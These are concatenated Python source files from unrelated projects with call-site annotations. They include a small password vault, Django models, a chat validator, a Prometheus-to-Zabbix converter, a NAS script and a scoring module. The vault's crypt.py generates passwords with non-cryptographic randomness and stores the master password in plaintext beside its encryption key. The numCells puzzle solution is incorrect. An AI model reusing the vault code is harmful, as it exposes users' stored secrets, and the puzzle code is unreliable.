ElyTgy/VaultDB | crypt.py | 9eef6f7298d26bd9a18d403971e1c3c6e7a2bf8a | # Importing Fernet class
from cryptography.fernet import Fernet
# Importing dump and load function
from pickle import dump,load
# To generate a strong pw
def generate_pw():
from random import choice
choices = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_-+=.,/<>?;:\\|[]}{")
pw = ""
for i in range(25):
pw += choice(choices)
return pw
del pw,choice
# To get master pw from the file
def get_masterpw():
# Opening the file storing master pw
with open("key.key",'rb') as file:
# Loading data
keys = load(file)
# Master pw is converted from bytes to string
key = keys[0].decode()
del keys
# Return keys
return key
# To get key from the file
def get_key():
# Opening the file storing master pw
with open("key.key",'rb') as file:
# Loading data
keys = load(file)
# Key is converted from bytes to string
key = keys[1].decode()
del keys
# Return keys
return key
# To store master pw in the file
def add_keys(masterpw,key):
# Opening the file to store master pw
with open("key.key",'wb') as file:
# Making list of value to upload
# key is already in bytes # Converting to bytes is not necessary
keys = [masterpw.encode(),key]
# Dumping the master pw to file
dump(keys,file)
# Deleting the variable
del masterpw,key,keys
# Checking if user is running program for first time
def is_1st_time():
# Trying to open bytes file
# If file is opened means program was executed once or more
try:
with open("key.key",'rb') as file:
pass
return False
# FileNotFound means its first time
# Or either its not in directory of this file or user deleted it :) #
except FileNotFoundError:
return True
# Function to copy pw to clipboard
def copy2clip(pw):
# Importing copy function
from pyperclip import copy
# Copying pw to clipboard
copy(pw)
del pw,copy
# Encrypting the text
def encrypt(text, key):
try:
# Defining Fernet(class) using the key
fernet = Fernet(key)
# Encryption # Text is converted to bytes
encrypted_text = fernet.encrypt(text.encode())
del key
# Return encrypted text
return encrypted_text
# Error message if any
except Exception as e:
print(f"Error occured:{e}\nProcess failed!")
# Decrypting the text
def decrypt(text, key):
try:
# Defining Fernet(class) using the key
fernet = Fernet(key)
# Decryption # Text is converted from bytes to string
decrypted_text = fernet.decrypt(text).decode()
del key
# Return decrypted text
return decrypted_text
# Error message if any
except Exception as e:
print(f"Error occured:{e}\nProcess failed!") | [((70, 4, 70, 12), 'pyperclip.copy', 'copy', ({(70, 9, 70, 11): 'pw'}, {}), '(pw)', False, 'from pyperclip import copy\n'), ((12, 14, 12, 29), 'random.choice', 'choice', ({(12, 21, 12, 28): 'choices'}, {}), '(choices)', False, 'from random import choice\n'), ((21, 15, 21, 25), 'pickle.load', 'load', ({(21, 20, 21, 24): 'file'}, {}), '(file)', False, 'from pickle import dump, load\n'), ((33, 15, 33, 25), 'pickle.load', 'load', ({(33, 20, 33, 24): 'file'}, {}), '(file)', False, 'from pickle import dump, load\n'), ((48, 8, 48, 23), 'pickle.dump', 'dump', ({(48, 13, 48, 17): 'keys', (48, 18, 48, 22): 'file'}, {}), '(keys, file)', False, 'from pickle import dump, load\n'), ((77, 17, 77, 28), 'cryptography.fernet.Fernet', 'Fernet', ({(77, 24, 77, 27): 'key'}, {}), '(key)', False, 'from cryptography.fernet import Fernet\n'), ((91, 17, 91, 28), 'cryptography.fernet.Fernet', 'Fernet', ({(91, 24, 91, 27): 'key'}, {}), '(key)', False, 'from cryptography.fernet import Fernet\n')] |
openeuler-mirror/oecp | oecp/executor/null.py | 967ed6b9e53f2da5f795f49bb5b5fc0423372863 | # -*- encoding=utf-8 -*-
"""
# **********************************************************************************
# Copyright (c) Huawei Technologies Co., Ltd. 2020-2020. All rights reserved.
# [oecp] is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
# **********************************************************************************
"""
from oecp.executor.base import CompareExecutor
class NullExecutor(CompareExecutor):
def __init__(self, dump_a, dump_b, config=None):
super(NullExecutor, self).__init__(dump_a, dump_b, config)
if hasattr(dump_a, 'run') and hasattr(dump_b, 'run'):
dump_a.run()
dump_b.run()
def run(self):
return []
| [] |
Biswa5812/CaramelIT-Django-Backend | courses/models.py | 1f896cb75295d17345a862b99837f0bdf60868b4 | from django.db import models
from django.utils import timezone
# Course Category
class Course_category(models.Model):
category_id = models.AutoField(primary_key=True)
category_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
# Course Subcategory
class Course_subcategory(models.Model):
subcategory_id = models.AutoField(primary_key=True)
category = models.ForeignKey(Course_category, on_delete=models.CASCADE)
subcategory_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
# Course
class Course(models.Model):
course_id = models.AutoField(primary_key=True)
subcategory = models.ForeignKey(Course_subcategory, on_delete=models.CASCADE)
subcategory_name = models.CharField(max_length=100)
category_name = models.CharField(max_length=100)
course_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
course_description = models.TextField(default="")
course_difficulty = models.CharField(max_length=30)
# Course resources
class Course_resource(models.Model):
course = models.ForeignKey(Course, on_delete=models.CASCADE)
resourse_content = models.TextField(default="NIL")
resourse_name = models.CharField(max_length=100)
resourse_link = models.CharField(max_length=200)
resourse_length = models.CharField(max_length=10)
date_of_creation = models.DateTimeField(default=timezone.now)
| [((6, 18, 6, 52), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import models\n'), ((7, 20, 7, 52), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((8, 23, 8, 65), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((12, 21, 12, 55), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import models\n'), ((13, 15, 13, 75), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((14, 23, 14, 55), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((15, 23, 15, 65), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((19, 16, 19, 50), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import models\n'), ((20, 18, 20, 81), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((21, 23, 21, 55), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((22, 20, 22, 52), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((23, 18, 23, 50), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((24, 23, 24, 65), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((25, 25, 25, 53), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((26, 24, 26, 55), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((30, 13, 30, 64), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((31, 23, 31, 54), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((32, 20, 32, 52), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((33, 20, 33, 52), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((34, 22, 34, 53), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((35, 23, 35, 65), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n')] |
thenetcircle/dino | dino/validation/events/message/limit_msg_length.py | 1047c3458e91a1b4189e9f48f1393b3a68a935b3 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import traceback
from yapsy.IPlugin import IPlugin
from activitystreams.models.activity import Activity
from dino import utils
from dino.config import ErrorCodes
from dino.config import ConfigKeys
from dino.environ import GNEnvironment
logger = logging.getLogger(__name__)
__author__ = 'Oscar Eriksson <[email protected]>'
class OnMessageCheckContentLength(IPlugin):
def __init__(self):
super(OnMessageCheckContentLength, self).__init__()
self.env = None
self.enabled = False
self.max_length = 1000
def setup(self, env: GNEnvironment):
self.env = env
validation_config = self.env.config.get(ConfigKeys.VALIDATION)
if 'on_message' not in validation_config or 'limit_msg_length' not in validation_config.get('on_message'):
logger.info('no config enabled for plugin not_full, ignoring plugin')
return
on_create_config = validation_config.get('on_message').get('limit_msg_length')
self.enabled = True
self.max_length = on_create_config.get(ConfigKeys.MAX_MSG_LENGTH, 1000)
def _process(self, data: dict, activity: Activity):
message = activity.object.content
if message is None or len(message.strip()) == 0:
return True, None, None
if not utils.is_base64(message):
return False, ErrorCodes.NOT_BASE64, \
'invalid message content, not base64 encoded'
message = utils.b64d(message)
if len(message) > self.max_length:
return False, ErrorCodes.MSG_TOO_LONG, \
'message content needs to be shorter than %s characters' % self.max_length
return True, None, None
def __call__(self, *args, **kwargs) -> (bool, str):
if not self.enabled:
return
data, activity = args[0], args[1]
try:
return self._process(data, activity)
except Exception as e:
logger.error('could not execute plugin not_full: %s' % str(e))
logger.exception(traceback.format_exc())
return False, ErrorCodes.VALIDATION_ERROR, 'could not execute validation plugin not_full'
| [((23, 9, 23, 36), 'logging.getLogger', 'logging.getLogger', ({(23, 27, 23, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((56, 18, 56, 37), 'dino.utils.b64d', 'utils.b64d', ({(56, 29, 56, 36): 'message'}, {}), '(message)', False, 'from dino import utils\n'), ((52, 15, 52, 39), 'dino.utils.is_base64', 'utils.is_base64', ({(52, 31, 52, 38): 'message'}, {}), '(message)', False, 'from dino import utils\n'), ((72, 29, 72, 51), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n')] |
tldr-devops/telegraf-monitoring-agent-setup | zabbix/prom2zabbix.py | 1f0b0f658acf9e685c121ffaee658bbe3fbad022 | #!/usr/bin/env python
# Script for parsing prometheus metrics format and send it into zabbix server
# MIT License
# https://github.com/Friz-zy/telegraf-monitoring-agent-setup
import re
import os
import sys
import time
import json
import socket
import optparse
try:
from urllib.request import urlopen
except:
from urllib import urlopen
METRICS = {
'default': {
'sort_labels': ['name', 'id', 'host', 'path', 'device', 'source', 'cpu'],
},
'docker_container_': {
'sort_labels': ['host', 'source', 'device', 'cpu'],
},
}
def parse(source='http://127.0.0.1:9273/metrics'):
# https://prometheus.io/docs/practices/naming/
# https://prometheus.io/docs/concepts/data_model/#metric-names-and-labels
regex = re.compile(r'^(?P<metric>[a-zA-Z_:][a-zA-Z0-9_:]*)(?P<labels>{.*})?\s+(?P<value>.+)(\s+(?P<timestamp>\w+))?$')
help_line = ''
type_line = ''
metrics = []
text = urlopen(source).read()
for line in text.splitlines():
line = line.decode("utf-8")
if line[0:6] == '# HELP':
help_line = line
continue
elif line[0:6] == '# TYPE':
type_line = line
continue
elif line[0] == '#':
continue
metric = regex.match(line).groupdict()
metric['line_raw'] = line
metric['help'] = help_line
metric['type'] = type_line
metric['source'] = source
metrics.append(metric)
return metrics
def main():
parser = optparse.OptionParser()
source = 'http://127.0.0.1:9273/metrics'
destination = '/tmp/prom2zabbix'
parser.set_defaults(source=source,
destination=destination,
hostname='')
parser.add_option("-s", "--source", dest="source",
help="Prometheus source, default is " + source)
parser.add_option("-d", "--destination", dest="destination",
help="Output .keys and .metrics files pattern, default is " + destination)
(options, args) = parser.parse_args()
seconds = int(time.time())
metrics = parse(options.source)
data = {"data": []}
keys = {}
# fill and prepare metric
for metric in metrics:
if not metric['timestamp']:
metric['timestamp'] = seconds
if not metric['labels']:
metric['labels'] = '{}'
else:
# limit lenght of metric because of zabbix limit
# for graph name even 132 char is too long
if len(metric['metric']) + len(metric['labels']) > 200:
metric['original_labels'] = metric['labels'].replace(',', ';')
short_labels = []
for label in metric['labels'].lstrip('{').rstrip('}').split(','):
for key in METRICS.keys():
if key in metric['metric'] and key != 'default':
for l in METRICS[key]['sort_labels']:
if l in label:
short_labels.append(label)
break
metric['labels'] = '{' + ';'.join(short_labels) + '}'
else:
metric['labels'] = metric['labels'].replace(',', ';')
# hacks
if metric['metric'] == 'procstat_created_at':
metric['value'] = metric['value'].replace('e+18', 'e+09')
m = {}
for k, v in metric.items():
m["{#%s}" % k.upper()] = v
data["data"].append(m)
# addition for metric labels macro
if metric['metric'] not in keys:
keys[metric['metric']] = {"data": []}
keys[metric['metric']]["data"].append({
"{#LABELS}": metric['labels']})
# write metrics
with open(options.destination + '.metrics', 'w') as f:
for metric in metrics:
# https://www.zabbix.com/documentation/3.0/manpages/zabbix_sender
escaped_labels = metric['labels'].replace('\\', '\\\\').replace('"', '\\"')
f.write('- "telegraf[%s,%s]" %s %s\n' % (
metric['metric'],
escaped_labels,
metric['timestamp'],
metric['value']))
# write keys
with open(options.destination + '.keys', 'w') as f:
for metric in keys:
f.write('- "telegraf[keys, %s]" %s "%s"\n' % (
metric,
seconds,
json.dumps(keys[metric]
).replace('\\', '\\\\').replace('"', '\\"')))
data = json.dumps(data)
escaped_data = data.replace('\\', '\\\\').replace('"', '\\"')
f.write('- "telegraf[keys]" %s "%s"\n' % (
seconds,
escaped_data))
# print(data)
if __name__ == "__main__":
main()
| [((31, 12, 31, 122), 're.compile', 're.compile', ({(31, 23, 31, 121): '"""^(?P<metric>[a-zA-Z_:][a-zA-Z0-9_:]*)(?P<labels>{.*})?\\\\s+(?P<value>.+)(\\\\s+(?P<timestamp>\\\\w+))?$"""'}, {}), "(\n '^(?P<metric>[a-zA-Z_:][a-zA-Z0-9_:]*)(?P<labels>{.*})?\\\\s+(?P<value>.+)(\\\\s+(?P<timestamp>\\\\w+))?$'\n )", False, 'import re\n'), ((60, 13, 60, 36), 'optparse.OptionParser', 'optparse.OptionParser', ({}, {}), '()', False, 'import optparse\n'), ((72, 18, 72, 29), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((135, 15, 135, 31), 'json.dumps', 'json.dumps', ({(135, 26, 135, 30): 'data'}, {}), '(data)', False, 'import json\n'), ((36, 11, 36, 26), 'urllib.urlopen', 'urlopen', ({(36, 19, 36, 25): 'source'}, {}), '(source)', False, 'from urllib import urlopen\n'), ((133, 12, 134, 24), 'json.dumps', 'json.dumps', ({(133, 23, 133, 35): 'keys[metric]'}, {}), '(keys[metric])', False, 'import json\n')] |
gatech-sysml/CompOFA | NAS/run_NAS.py | baf561f14a561547ff51933e45f90ddf00cbb3cf | # CompOFA – Compound Once-For-All Networks for Faster Multi-Platform Deployment
# Under blind review at ICLR 2021: https://openreview.net/forum?id=IgIk8RRT-Z
#
# Implementation based on:
# Once for All: Train One Network and Specialize it for Efficient Deployment
# Han Cai, Chuang Gan, Tianzhe Wang, Zhekai Zhang, Song Han
# International Conference on Learning Representations (ICLR), 2020.
import os
import sys
import torch
import time
import math
import copy
import random
import argparse
import torch.nn as nn
import numpy as np
import pandas as pd
from torchvision import transforms, datasets
from matplotlib import pyplot as plt
sys.path.append("..")
from ofa.model_zoo import ofa_net
from ofa.utils import download_url
from accuracy_predictor import AccuracyPredictor
from flops_table import FLOPsTable
from latency_table import LatencyTable
from evolution_finder import EvolutionFinder
from imagenet_eval_helper import evaluate_ofa_subnet, evaluate_ofa_specialized
parser = argparse.ArgumentParser()
parser.add_argument(
'-n',
'--net',
metavar='OFANET',
help='OFA network',
required=True)
parser.add_argument(
'-t',
'--target-hardware',
metavar='TARGET_HARDWARE',
help='Target Hardware',
required=True)
parser.add_argument(
'--imagenet-path',
metavar='IMAGENET_PATH',
help='The path of ImageNet',
type=str,
required=True)
args = parser.parse_args()
arch = {'compofa' : ('compofa', 'model_best_compofa_simple.pth.tar'),
'compofa-elastic' : ('compofa-elastic', 'model_best_compofa_simple_elastic.pth.tar'),
'ofa_mbv3_d234_e346_k357_w1.0' : ('ofa', 'ofa_mbv3_d234_e346_k357_w1.0'),
}
hardware_latency = {'note10' : [15, 20, 25, 30],
'gpu' : [15, 25, 35, 45],
'cpu' : [12, 15, 18, 21]}
MODEL_DIR = '../ofa/checkpoints/%s' % (arch[args.net][1])
imagenet_data_path = args.imagenet_path
# imagenet_data_path = '/srv/data/datasets/ImageNet/'
# set random seed
random_seed = 3
random.seed(random_seed)
np.random.seed(random_seed)
torch.manual_seed(random_seed)
print('Successfully imported all packages and configured random seed to %d!'%random_seed)
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
cuda_available = torch.cuda.is_available()
if cuda_available:
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.cuda.manual_seed(random_seed)
print('Using GPU.')
else:
print('Using CPU.')
# Initialize the OFA Network
ofa_network = ofa_net(args.net, model_dir=MODEL_DIR, pretrained=True)
if args.target_hardware == 'cpu':
ofa_network = ofa_network.cpu()
else:
ofa_network = ofa_network.cuda()
print('The OFA Network is ready.')
# Carry out data transforms
if cuda_available:
def build_val_transform(size):
return transforms.Compose([
transforms.Resize(int(math.ceil(size / 0.875))),
transforms.CenterCrop(size),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
),
])
data_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(
root=os.path.join(imagenet_data_path, 'val'),
transform=build_val_transform(224)
),
batch_size=250, # test batch size
shuffle=True,
num_workers=16, # number of workers for the data loader
pin_memory=True,
drop_last=False,
)
print('The ImageNet dataloader is ready.')
else:
data_loader = None
print('Since GPU is not found in the environment, we skip all scripts related to ImageNet evaluation.')
# set up the accuracy predictor
accuracy_predictor = AccuracyPredictor(
pretrained=True,
device='cuda:0' if cuda_available else 'cpu'
)
print('The accuracy predictor is ready!')
print(accuracy_predictor.model)
# set up the latency table
target_hardware = args.target_hardware
use_latency_table = True if target_hardware == 'note10' else False
latency_table = LatencyTable(device=target_hardware,
use_latency_table=use_latency_table,
network=args.net)
""" Hyper-parameters for the evolutionary search process
You can modify these hyper-parameters to see how they influence the final ImageNet accuracy of the search sub-net.
"""
latency_constraint = hardware_latency[args.target_hardware][0] # ms
P = 100 # The size of population in each generation
N = 500 # How many generations of population to be searched
r = 0.25 # The ratio of networks that are used as parents for next generation
params = {
'constraint_type': target_hardware, # Let's do FLOPs-constrained search
'efficiency_constraint': latency_constraint,
'mutate_prob': 0.1, # The probability of mutation in evolutionary search
'mutation_ratio': 0.5, # The ratio of networks that are generated through mutation in generation n >= 2.
'efficiency_predictor': latency_table, # To use a predefined efficiency predictor.
'accuracy_predictor': accuracy_predictor, # To use a predefined accuracy_predictor predictor.
'population_size': P,
'max_time_budget': N,
'parent_ratio': r,
'arch' : arch[args.net][0],
}
# initialize the evolution finder and run NAS
finder = EvolutionFinder(**params)
result_lis = []
for latency in hardware_latency[args.target_hardware]:
finder.set_efficiency_constraint(latency)
best_valids, best_info = finder.run_evolution_search()
result_lis.append(best_info)
print("NAS Completed!")
# evaluate the searched model on ImageNet
models = []
if cuda_available:
for result in result_lis:
_, net_config, latency = result
print('Evaluating the sub-network with latency = %.1f ms on %s' % (latency, target_hardware))
top1 = evaluate_ofa_subnet(
ofa_network,
imagenet_data_path,
net_config,
data_loader,
batch_size=250,
device='cuda:0' if cuda_available else 'cpu')
models.append([net_config, top1, latency])
df = pd.DataFrame(models, columns=['Model', 'Accuracy', 'Latency'])
df.to_csv('NAS_results.csv')
print('NAS results saved to NAS_results.csv')
| [((24, 0, 24, 21), 'sys.path.append', 'sys.path.append', ({(24, 16, 24, 20): '""".."""'}, {}), "('..')", False, 'import sys\n'), ((33, 9, 33, 34), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((67, 0, 67, 24), 'random.seed', 'random.seed', ({(67, 12, 67, 23): 'random_seed'}, {}), '(random_seed)', False, 'import random\n'), ((68, 0, 68, 27), 'numpy.random.seed', 'np.random.seed', ({(68, 15, 68, 26): 'random_seed'}, {}), '(random_seed)', True, 'import numpy as np\n'), ((69, 0, 69, 30), 'torch.manual_seed', 'torch.manual_seed', ({(69, 18, 69, 29): 'random_seed'}, {}), '(random_seed)', False, 'import torch\n'), ((73, 17, 73, 42), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((83, 14, 83, 69), 'ofa.model_zoo.ofa_net', 'ofa_net', (), '', False, 'from ofa.model_zoo import ofa_net\n'), ((121, 21, 124, 1), 'accuracy_predictor.AccuracyPredictor', 'AccuracyPredictor', (), '', False, 'from accuracy_predictor import AccuracyPredictor\n'), ((131, 16, 133, 46), 'latency_table.LatencyTable', 'LatencyTable', (), '', False, 'from latency_table import LatencyTable\n'), ((156, 9, 156, 34), 'evolution_finder.EvolutionFinder', 'EvolutionFinder', ({}, {}), '(**params)', False, 'from evolution_finder import EvolutionFinder\n'), ((179, 5, 179, 67), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((77, 4, 77, 39), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', ({(77, 27, 77, 38): 'random_seed'}, {}), '(random_seed)', False, 'import torch\n'), ((170, 15, 176, 57), 'imagenet_eval_helper.evaluate_ofa_subnet', 'evaluate_ofa_subnet', (), '', False, 'from imagenet_eval_helper import evaluate_ofa_subnet, evaluate_ofa_specialized\n'), ((95, 12, 95, 39), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', ({(95, 34, 95, 38): 'size'}, {}), '(size)', False, 'from torchvision import transforms, datasets\n'), ((96, 12, 96, 33), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ({}, {}), '()', False, 'from torchvision import transforms, datasets\n'), ((97, 12, 100, 13), 'torchvision.transforms.Normalize', 'transforms.Normalize', (), '', False, 'from torchvision import transforms, datasets\n'), ((105, 17, 105, 56), 'os.path.join', 'os.path.join', ({(105, 30, 105, 48): 'imagenet_data_path', (105, 50, 105, 55): '"""val"""'}, {}), "(imagenet_data_path, 'val')", False, 'import os\n'), ((94, 34, 94, 57), 'math.ceil', 'math.ceil', ({(94, 44, 94, 56): '(size / 0.875)'}, {}), '(size / 0.875)', False, 'import math\n')] |
ace-gabriel/chrome-extension | application/model/radar_score_20180117/score_calculate.py | be0b7d7278f56f8218be7f734b3fb1e05a4f3eb9 | # coding: utf-8
import pickle
# import json
# import types
path = 'application/model/radar_score_20180117/'
def f(x, x_range, score):
bottom = 20
y = []
for i in x:
if i < x_range[0]:
pos = 0
else:
for j in range(len(x_range)):
if j == len(x_range) - 1 or \
i >= x_range[j] and i < x_range[j + 1]:
pos = j
break
s = sum(score[:pos]) + score[pos] * (i - x_range[pos])
y.append(s + bottom)
return y
def process_score(house):
# with open('radar.json', 'r') as fj:
# house = json.load(fj)
# print radar
# print house
score = {
'score_appreciation': 60,
'score_cost': 60,
'score_rental': 60,
'score_airbnb': 60,
'score_anti_risk': 60
}
with open(path+'scoremodel.pkl', 'rb') as fp:
# pickle.dump([radar, factor, x_range, score], fopen)
N = 4
a = pickle.load(fp)
if 'increase_ratio' in house and house['increase_ratio'] != None:
# 房屋增值
x = house['increase_ratio'] * a[1]
score['score_appreciation'] = f([x], a[2], a[3])[0]
# print x, score['score_appreciation']
a = pickle.load(fp)
if 'house_price_dollar' in house and house['house_price_dollar'] != None:
# 持有成本
x = a[1] / house['house_price_dollar']
# print 'house_price_dollar', house['house_price_dollar']
score['score_cost'] = f([x], a[2], a[3])[0]
# print score['score_cost']
if 'airbnb_rent' in house and house['airbnb_rent'] != None:
# 短租收益
a = pickle.load(fp)
x = house['airbnb_rent'] * 12.0 / house['house_price_dollar'] * a[1]
score['score_airbnb'] = f([x], a[2], a[3])[0]
# print score['score_airbnb']
a = pickle.load(fp)
if 'rental_income_ratio' in house and house['rental_income_ratio'] != None:
# 长租收益
x = house['rental_income_ratio'] * a[1]
score['score_rental'] = f([x], a[2], a[3])[0]
# print score['score_rental']
if 'neighborhood' in house and 'id' in house['neighborhood'] and house['neighborhood']['id'] != None:
with open(path+'region_anti_drop.pkl', 'r') as fp:
# 抗跌能力
region = pickle.load(fp)
score_anti = pickle.load(fp)
if house['neighborhood']['id'] in region:
# print house['neighborhood']['id']
i = region.index(house['neighborhood']['id'])
score['score_anti_risk'] = score_anti[i]
# for i in score:
# print '%20s %2.3f ' % (i, score[i])
# check: make sure score in range(20, 100)
for i in score:
if score[i] < 20:
score[i] = 20
if score[i] > 100:
score[i] = 100
return score
if __name__ == '__main__':
# README
print "This is a program calculating house's 5 scores:" \
"Anti Drop Score," \
"House Appreciation," \
"Possess Cost," \
"Long-term Income" \
"Short-term Income"
| [] |
xi6th/Python_Algorithm | Dominant_cell.py | 05852b6fe133df2d83ae464b779b0818b173919d | #!/bin/python3
import math
import os
import random
import re
import sys
from typing import Counter
#
# Complete the 'numCells' function below.
#
# The function is expected to return an INTEGER.
# The function accepts 2D_INTEGER_ARRAY grid as parameter.
#
def numCells(grid):
# Write your code here
n = []
m = []
for neigbours in grid:
individual = max(neigbours)
n.append(individual)
m = len(n)
return(m)
# for individuals in neigbours:
# print(individuals)
grid = [[1, 2, 7], [4, 5, 6], [8, 8, 9]]
print(numCells(grid))
# if __name__ == '__main__':
# fptr = open(os.environ['OUTPUT_PATH'], 'w')
# grid_rows = int(input().strip())
# grid_columns = int(input().strip())
# grid = []
# for _ in range(grid_rows):
# grid.append(list(map(int, input().rstrip().split())))
# result = numCells(grid)
# fptr.write(str(result) + '\n')
# fptr.close()
| [] |
Sult/evetool | evetool/urls.py | 155db9f3b0ecc273fe3c75daf8f9c6f37cb3e47f | from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
urlpatterns = [
# Examples:
# url(r'^$', 'evetool.views.home', name='home'),
url(r'^', include('users.urls')),
url(r'^', include('apis.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| [((10, 4, 10, 67), 'django.conf.urls.static.static', 'static', (), '', False, 'from django.conf.urls.static import static\n'), ((8, 14, 8, 35), 'django.conf.urls.include', 'include', ({(8, 22, 8, 34): '"""users.urls"""'}, {}), "('users.urls')", False, 'from django.conf.urls import include, url\n'), ((9, 14, 9, 34), 'django.conf.urls.include', 'include', ({(9, 22, 9, 33): '"""apis.urls"""'}, {}), "('apis.urls')", False, 'from django.conf.urls import include, url\n')] |
lastone9182/console-keep | actvenv.py | 250b49653be9d370a1bb0f1c39c5f853c2eaa47e | import os
# virtualenv
SCRIPTDIR = os.path.realpath(os.path.dirname(__file__))
venv_name = '_ck'
osdir = 'Scripts' if os.name is 'nt' else 'bin'
venv = os.path.join(venv_name, osdir, 'activate_this.py')
activate_this = (os.path.join(SCRIPTDIR, venv))
# Python 3: exec(open(...).read()), Python 2: execfile(...)
exec(open(activate_this).read(), dict(__file__=activate_this)) | [((8, 7, 8, 57), 'os.path.join', 'os.path.join', ({(8, 20, 8, 29): 'venv_name', (8, 31, 8, 36): 'osdir', (8, 38, 8, 56): '"""activate_this.py"""'}, {}), "(venv_name, osdir, 'activate_this.py')", False, 'import os\n'), ((9, 17, 9, 46), 'os.path.join', 'os.path.join', ({(9, 30, 9, 39): 'SCRIPTDIR', (9, 41, 9, 45): 'venv'}, {}), '(SCRIPTDIR, venv)', False, 'import os\n'), ((4, 29, 4, 54), 'os.path.dirname', 'os.path.dirname', ({(4, 45, 4, 53): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
zealoussnow/chromium | testing/scripts/checklicenses.py | fd8a8914ca0183f0add65ae55f04e287543c7d4a | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import sys
import common
def main_run(args):
with common.temporary_file() as tempfile_path:
rc = common.run_command([
os.path.join(common.SRC_DIR, 'tools', 'checklicenses',
'checklicenses.py'),
'--json', tempfile_path
])
with open(tempfile_path) as f:
checklicenses_results = json.load(f)
result_set = set()
for result in checklicenses_results:
result_set.add((result['filename'], result['license']))
json.dump({
'valid': True,
'failures': ['%s: %s' % (r[0], r[1]) for r in result_set],
}, args.output)
return rc
def main_compile_targets(args):
json.dump([], args.output)
if __name__ == '__main__':
funcs = {
'run': main_run,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
| [((29, 2, 32, 17), 'json.dump', 'json.dump', ({(29, 12, 32, 3): "{'valid': True, 'failures': [('%s: %s' % (r[0], r[1])) for r in result_set]}", (32, 5, 32, 16): 'args.output'}, {}), "({'valid': True, 'failures': [('%s: %s' % (r[0], r[1])) for r in\n result_set]}, args.output)", False, 'import json\n'), ((38, 2, 38, 28), 'json.dump', 'json.dump', ({(38, 12, 38, 14): '[]', (38, 16, 38, 27): 'args.output'}, {}), '([], args.output)', False, 'import json\n'), ((15, 7, 15, 30), 'common.temporary_file', 'common.temporary_file', ({}, {}), '()', False, 'import common\n'), ((46, 11, 46, 49), 'common.run_script', 'common.run_script', ({(46, 29, 46, 41): 'sys.argv[1:]', (46, 43, 46, 48): 'funcs'}, {}), '(sys.argv[1:], funcs)', False, 'import common\n'), ((23, 30, 23, 42), 'json.load', 'json.load', ({(23, 40, 23, 41): 'f'}, {}), '(f)', False, 'import json\n'), ((17, 8, 18, 40), 'os.path.join', 'os.path.join', ({(17, 21, 17, 35): 'common.SRC_DIR', (17, 37, 17, 44): '"""tools"""', (17, 46, 17, 61): '"""checklicenses"""', 